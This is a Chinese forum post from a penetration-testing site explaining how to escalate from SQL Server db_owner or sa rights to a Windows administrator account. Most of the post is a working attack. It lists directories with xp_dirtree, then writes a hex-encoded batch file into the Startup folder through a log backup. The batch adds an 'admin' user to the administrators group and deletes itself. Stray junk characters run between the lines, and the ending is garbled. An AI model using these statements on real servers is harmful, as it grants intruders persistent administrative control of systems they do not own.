中国网络渗透测试联盟
标题:
DB_OWNER.SA备份BAT到启动项提权
[打印本页]
作者:
admin
时间:
2013-2-14 00:08
标题:
DB_OWNER.SA备份BAT到启动项提权
下面只给出关键的代码:
) h3 I: I' B6 w3 h
使用查询分析器或者webshell连接上数据库后按如下步骤操作即可:
1 {" b. Q/ P5 Z
1.DB权限列目录
. ]; U9 f" z+ S" O2 o1 G
exec master..xp_dirtree ‘c:\’,1,1
' [( {2 L& b/ t% s
使用以上语句可以实现db权限下列出磁盘目录
" t( |# Y3 u$ \1 s. H* g
下面我们用备份的方式来备份一个BAT到启动项里
/ p; N& X, c$ K T' j
——————————————————————————————————————————————————————–
3 L+ Z. Y4 o3 ^1 Q' f1 h5 ]; ~
alter database [abc] set RECOVERY FULL–
5 k0 a3 f* [9 A' D
create table cmd (a image)–
- D, C; |. A0 p6 a& L+ k
backup log [abc] to disk = ‘c:\cmd1′ with init–
( k. S v; ]4 r5 C( v
insert into cmd (a) values (0x406563686F206F66660D0A406364202577696E646972250D0A406E657420757365722061646D696E2061646D696E202F6164640D0A406E6574206C6F63616C67726F75702061646D696E6973747261746F72732061646D696E202F6164640D0A4064656C2073746172742E6261740D0A40657869740D0A400D0A)–
2 {$ }6 K7 K0 }" |7 X5 \4 x; c
backup log [abc] to disk = ‘C:\Documents and Settings\All Users\「开始」菜单\程序\启动\start.bat’–
! p/ ]4 ]2 N6 f
drop table cmd–
s: d& a- b2 H8 a0 ]" Y# q
——————————————————————————————————————————————————————–
4 z" J6 e" l6 y3 C) c
上面这几条SQL语句就是备份的语句.这里要注的是:
7 k1 t4 L7 H6 K0 \* D2 f( ?
0x6E0065007400200075007300650072002000610064006D0069006E002000610064006D0069006E0020002F006100640064002000260020006E006500740020006C006F00630061006C00670072006F00750070002000610064006D0069006E006900730074007200610074006F00720073002000610064006D0069006E0020002F00610064006400200026002000640065006C002000730074006100720074002E00640061007400 这一句HEX加密的 是我们要打的命令 下面我告诉大家这个加密码的格式怎么用
1 H0 O1 \" W$ L4 c5 ^- I2 ~
编辑一个加用户ADMIN的命令 并删除START.BAT
3 C0 z$ B. D# N/ l4 {7 ^) [- F
@echo off
' T% W' x) ~) e0 Z0 O8 N' ^
@cd %windir% /*这里也可以CD到SYSTEM32目录*/
R! m, @6 W5 n1 I2 f
@net user admin admin /add
/ c/ z' ^! G, E% _( [0 v
@net localgroup administrators admin /add
8 ^9 L+ l ~# B( i) I! C
@del start.bat /*这一步删除了BAT文件*/
' c5 D' {* w! K6 ^
@exit /*这一步退出CMD*/
8 S5 }0 y6 k# |1 v
@ /*最后这个@最好加上.要不会把你的上一句命令弄出错*/
% F& K: b$ ?5 n9 w
列数据库的命令:SELECT DB_NAME()
4 f% U2 S" ~7 N
我这现在连接的库是abc
. B S4 [& ?9 [! S# Z1 m5 Q
那么我们要把备份语句中的库名换成当前库的名abc
" s( n. j- y0 E4 a* S
执行上面SQL语句后返回如下信息:
6 w7 J% [3 m! ^, [3 V
已处理 1 页,这些页属于数据库 abc的文件 abc_Log’(位于文件 1 上)。
8 @9 g$ a: v) @; Y# \/ J, |
BACKUP LOG 操作成功地处理了 1 页,花费了 0.048 秒(0.160 MB/秒)。
( {: l( `7 f O' E$ F g% C, z
(1 row(s) affected)
! M |, @: h* _# s: {3 d$ i
已处理 1 页,这些页属于数据库 abc的文件 abc_Log’(位于文件 1 上)。
2 ?" x$ H2 o% Q! L6 G* Q
BACKUP LOG 操作成功地处理了 1 页,花费了 0.043 秒(0.083 MB/秒)。
% r0 z! w+ v6 q% `! o6 r/ d
说明我们备份成功了,到启动项里看看是不是多了一个bat文件,现在只等服务器重启并登陆后就会添加一个我们预先定义好的管理员账Я恕�
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2